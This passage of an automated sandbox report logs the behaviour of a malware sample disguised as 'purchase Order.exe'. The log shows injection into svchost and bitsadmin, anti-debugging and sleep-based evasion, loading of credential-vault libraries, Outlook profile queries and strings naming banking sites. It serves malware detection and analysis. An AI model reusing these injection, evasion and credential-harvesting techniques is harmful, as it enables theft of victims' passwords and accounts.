                Source: C:\Users\user\Desktop\purchase Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase Order.exe"
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\purchase Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: purchase Order.exeStatic file information: File size 1209344 > 1048576
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: McqlvggSSSjC.exe, 00000004.00000002.3221614821.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, McqlvggSSSjC.exe, 00000006.00000000.1689659605.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp
                Source: purchase Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: purchase Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: purchase Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: purchase Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: purchase Order.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5E01E LoadLibraryA,GetProcAddress,0_2_00C5E01E
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C66B05 push ecx; ret 0_2_00C66B18
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEA5 push esi; retf 0_2_00C4EEA6
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEAD push esi; retf 0_2_00C4EEAE
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEAF push esi; retf 0_2_00C4EEB2
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEB3 push esi; retf 0_2_00C4EEB6
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEBD push edi; retf 0_2_00C4EEBE
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEBF push esi; retf 0_2_00C4EEC2
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EEB9 push edi; retf 0_2_00C4EEBA
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EE0D push ebp; retf 0_2_00C4EE0E
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4EE12 push esi; retf 0_2_00C4EE16
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C515CD pushfd ; retf 0_2_00C515D6
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C515DB pushfd ; retf 0_2_00C51616
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4FD8C push FFFFFF8Ch; retf 0_2_00C4FDE6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402055 push edx; iretd 2_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018A1 push edx; iretd 2_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414930 push eax; retf 2_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181E4 push ds; retf 2_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040218B push ebp; iretd 2_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D9B6 push FFFFFFEBh; iretd 2_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AA30 push edx; retf 2_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004192F1 push edx; ret 2_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425433 push edi; ret 2_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414658 push esp; ret 2_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414E8B pushfd ; iretd 2_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A7C3 push edi; ret 2_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D7CA push ecx; ret 2_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00CA8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CA8111
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C5EB42
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C6123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C6123A
                Source: C:\Users\user\Desktop\purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\purchase Order.exeAPI/Special instruction interceptor: Address: 17CE07C
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: purchase Order.exe, 00000000.00000002.1397036042.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1375746834.0000000001653000.00000004.00000020.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1375841506.00000000016B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Users\user\Desktop\purchase Order.exeEvaded block: after key decisiongraph_0-95947
                Source: C:\Users\user\Desktop\purchase Order.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-96486
                Source: C:\Users\user\Desktop\purchase Order.exeAPI coverage: 4.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6556Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6556Thread sleep time: -88000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe TID: 336Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe TID: 336Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C86CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C86CA9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00C860DD
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00C863F9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C8EB60
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C8F5FA
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8F56F FindFirstFileW,FindClose,0_2_00C8F56F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C91B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C91B2F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C91C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C91C8A
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C91F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C91F94
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C5DDC0
                Source: z5f52P3-.5.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116964T
                Source: z5f52P3-.5.drBinary or memory string: global block list test formVMware20,11696497155
                Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,1169649
                Source: z5f52P3-.5.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155e
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: z5f52P3-.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: z5f52P3-.5.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: z5f52P3-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11
                Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169649715
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221401387.000000000136F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1920228565.0000020AF2B9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.5.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: z5f52P3-.5.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: z5f52P3-.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: z5f52P3-.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: z5f52P3-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: z5f52P3-.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: z5f52P3-.5.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: z5f52P3-.5.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: z5f52P3-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: z5f52P3-.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: z5f52P3-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: z5f52P3-.5.drBinary or memory string: discord.comVMware20,11696497155f
                Source: z5f52P3-.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: z5f52P3-.5.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: z5f52P3-.5.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: z5f52P3-.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: z5f52P3-.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696
                Source: z5f52P3-.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-95156
                Source: C:\Users\user\Desktop\purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-96236
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B23 LdrLoadDll,2_2_00417B23
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C96AAF BlockInput,0_2_00C96AAF
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C43D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C43D19
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C73920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00C73920
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5E01E LoadLibraryA,GetProcAddress,0_2_00C5E01E
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_017CE348 mov eax, dword ptr fs:[00000030h]0_2_017CE348
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_017CE2E8 mov eax, dword ptr fs:[00000030h]0_2_017CE2E8
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_017CCCC8 mov eax, dword ptr fs:[00000030h]0_2_017CCCC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
